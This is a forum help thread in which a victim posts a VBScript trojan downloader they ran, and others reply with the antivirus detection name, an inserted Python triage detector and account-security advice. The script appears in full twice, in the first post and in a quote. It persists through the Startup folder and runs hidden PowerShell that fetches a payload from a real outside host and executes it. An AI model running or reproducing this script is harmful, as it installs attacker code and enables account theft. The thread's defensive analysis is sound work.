NotMikaa 0 Posted December 1

Hi! So I came about this being dumb and installed it. Didn't think anything of it at first until I noticed out of the corner of my eye that TeamViewer was opened and they were attempting to go into my Gmail. They've already looked into my PayPal.

dim s15001
const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

Marcos 3,030 Posted December 1

A detection was added several days ago; the script is detected as VBS/TrojanDownloader.Agent.SGV trojan. When the malware is detected, it should be cleaned without issues since it's a simple VB downloader script.
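
Added example, not part of the thread and not any poster's or vendor's detection logic: a static triage check for the kind of script in the first post, which splits strings such as "powers" & "hell " so that a plain text search misses them. The sample input is constructed (placeholder host, PowerShell part cut down), and the indicator names and patterns are assumptions chosen for illustration.

```python
import re

# Constructed sample modelled on the script in the first post. The host is a
# placeholder and the PowerShell part is cut down so it does nothing if run.
SAMPLE = r'''set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -command $c = New-Object System.Net.WebClient;$s = $c.OpenRead('htt" & "p://" & "placeholder.invalid/x.jpg');IEX $r", 0, true
'''
BENIGN = 'MsgBox "Hello " & "world"\n'  # constructed: harmless concatenation

# Adjacent string literals joined with &, e.g. "powers" & "hell " -> "powershell "
_CONCAT = re.compile(r'"\s*&\s*"')

# Indicator name -> pattern, matched against normalized (joined, lower-cased) text.
INDICATORS = {
    "startup_persistence": re.compile(r'specialfolders\s*\(\s*"startup"\s*\)'),
    "self_copy": re.compile(r'copyfile\s+wscript\.scriptfullname'),
    "hidden_powershell": re.compile(r'powershell\b.*-w(indowstyle)?\s+hidden'),
    "policy_bypass": re.compile(r'-executionpolicy\s+bypass'),
    "web_download": re.compile(r'net\.webclient|downloadstring|openread\s*\('),
    "iex_of_download": re.compile(r'\biex\b|invoke-expression'),
}

def normalize(vbs_source):
    """Undo literal splitting so keywords become searchable again."""
    text = re.sub(r'\s_\r?\n', ' ', vbs_source)  # VBScript " _" line continuation
    return _CONCAT.sub('', text).lower()

def triage(vbs_source):
    """Return matched indicators plus two verdicts derived from them."""
    text = normalize(vbs_source)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    found = set(hits)
    return {
        "hits": hits,
        # fetches remote content and executes it in memory
        "downloader": {"web_download", "iex_of_download"} <= found,
        # copies itself into the Startup folder to run at every logon
        "persistent": {"startup_persistence", "self_copy"} <= found,
    }

if __name__ == "__main__":
    print("raw text contains 'powershell':", "powershell" in SAMPLE.lower())
    print(triage(SAMPLE))
```

A "persistent" verdict also means cleanup has to include the copy in the user's Startup folder (update.vbs in the posted script), not only the file that was originally run.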

Rami 50 Posted December 2 (edited)

On 12/1/2019 at 7:58 AM, NotMikaa said:

> Hi! So I came about this being dumb and installed it. Didn't think anything of it at first until I noticed out of the corner of my eye that TeamViewer was opened and they were attempting to go into my Gmail. They've already looked into my PayPal.
>
> dim s15001
> const CONSOLE_HIDE=0
> const CONSOLE_SHOW=1
> const CMD_WAIT=true
> set oShell = wscript.createObject("WScript.Shell")
> set sysOb = createobject("scripting.filesystemobject")
> startup = oShell.specialfolders ("startup") & "\update.vbs"
> sysOb.copyfile wscript.scriptfullname,startup ,true
> oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

You should secure your TeamViewer/AnyDesk or whatever your remote desktop software is. Put a good password and limit access only to your PCs. Because they have got access to several accounts of yours, you should change all passwords now, and secure them with 2-step verification for more secure entry to your accounts.

Edited December 2 by Rami